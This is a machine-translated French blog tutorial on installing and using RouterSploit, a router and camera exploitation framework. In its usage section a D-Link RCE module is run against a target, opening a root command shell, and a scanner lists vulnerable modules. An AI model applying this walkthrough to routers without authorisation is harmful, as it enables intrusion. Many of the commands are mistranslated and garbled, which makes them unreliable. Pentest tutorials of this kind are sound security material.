Accueil » Outils Linux » RouterSploit – Tutoriel complet sur le cadre d'exploitation [2020]

RouterSploit – Tutoriel complet sur le cadre d'exploitation [2020]

par le Suyash
routersploit

RouterSploit est un cadre d'exploitation incroyable spécialement conçu pour les appareils embarqués.

Cet outil peut être utilisé par le pentester pour analyser la sécurité des caméras et des routeurs.

Points forts de RouterSploit:

  • Codé en Python.
  • Interface de ligne de commande.
  • Prise en charge de Docker.
  • Outils modulaires.

Système d'Exploitation pris en charge:

  1. MacOS.
  2. Linux.
  3. Téléphone Android.
  4. les fenêtres.

Installation de RouterSploit:

Exigences:

  • futur
  • demandes
  • paramiko
  • pysnmp
  • pycrypto

Optionnel:

  • bluepy – bluetooth basse énergie

Installation sous Kali Linux:

Suivez les commandes ci-dessous:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Prise en charge Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation dans Ubuntu:

Suivez les commandes ci-dessous:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Prise en charge Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation sur MacOS:

Suivez les commandes ci-dessous:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Installation sur Docker:

Suivez les commandes ci-dessous:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Comment mettre à jour RouterSploit?

Vous devez mettre à jour RouterSploit souvent pour éviter les désagréments.

De nouveaux modules sont expédiés presque tous les jours.

cd routersploit
git pull

Comment utiliser RouterSploit?

Usage

root @ kalidev:~ / git / routersploit # ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _ __  `-. _ __ | | ___ _| |_
 |    // _ \| | | | __ / _ \ «__|`-. \ «_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __ / |  /\__ / / |_) | | (_) | | |_
  _| \_  ___ /  __,_|\__  ___|_|  \____ /| .__ /|_|\___ /|_|\__|
                                     | |
       Cadre d'exploitation pour    |_|   par Threat9
            Appareils embarqués
  
 Nom de code   : Je savais que tu allais créer des problèmes
 Version    : 3.3.0
 Page d'accueil   : https://www.threat9.com/ - @threatnine
 Rejoignez Slack : routersploit.slack.com

 Rejoignez le programme Threat9 Beta - https://www.threat9.com/

 Exploits: 128 Scanners: 4 Creds: 165 Générique: 4 Charges utiles: 32 Encodeurs: 6

rsf >

Exploits:

Préformer l'Exploitation, il suffit de choisir le module et de définir la cible:

rsf > utiliser des exploits /
exploits / 2wire / exploits / asmax / exploits / asus / exploits / cisco / exploits / dlink / exploits / fortinet / exploits / juniper / exploits / linksys / exploits / multi / exploits / netgear /
rsf > utiliser des exploits / dlink / dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Pour terminer, utilisez la touche de tabulation.

Pour afficher les options, typeshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > afficher les options

Options cibles:


   Nom Paramètres actuels Description                                
   ----       ----------------     -----------                                
   cible Adresse cible par ex.. http://192.168.1.1     
   Port       80                   Port cible

Utilisationrun ouexploit commande pour exploiter la cible:

rsf (D-LINK DIR-300 & DIR-600 RCE) > courir
[+] La cible est vulnérable
[*] Appel de la boucle de commande ...
cmd > qui suis je
racine

Pour définir des options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > définir la cible http://192.168.1.1 [+] {'cible': «http://192.168.1.1"}

Il est possible de vérifier si la cible est vulnérable à un exploit particulier:

rsf (D-LINK DIR-300 & DIR-600 RCE) > vérifier
[+] La cible est vulnérable

Courirshow info pour afficher des informations sur l'exploit.

Recherche de cibles vulnérables:

Les scanners permettent de vérifier rapidement si la cible est vulnérable à des exploits.

Utilisez les mêmes commandes pour afficher / définir les options, et aussi pour courir.

rsf (Scanner D-Link) > courir
[+] exploits / dlink / dwr_932_info_disclosure est vulnérable
[-] exploits / dlink / dir_300_320_615_auth_bypass n'est pas vulnérable
[-] exploits / dlink / dsl_2750b_info_disclosure n'est pas vulnérable
[-] exploits / dlink / dns_320l_327l_rce n'est pas vulnérable
[-] exploits / dlink / dir_645_password_disclosure n'est pas vulnérable
[-] exploits / dlink / dir_300_600_615_info_disclosure n'est pas vulnérable
[-] exploits / dlink / dir_300_600_rce n'est pas vulnérable

[+] L'appareil est vulnérable!
- exploits / dlink / dwr_932_info_disclosure

RouterSploit officiel

Lire aussi: 1337x proxy

Mots finaux:

RouterSploit est un outil incroyable à utiliser.

Si vous rencontrez des problèmes concernant RouterSploit. Assurez-vous de commenter ci-dessous. Notre équipe CSHAWK vous contactera dès que possible.

Laissez un commentaire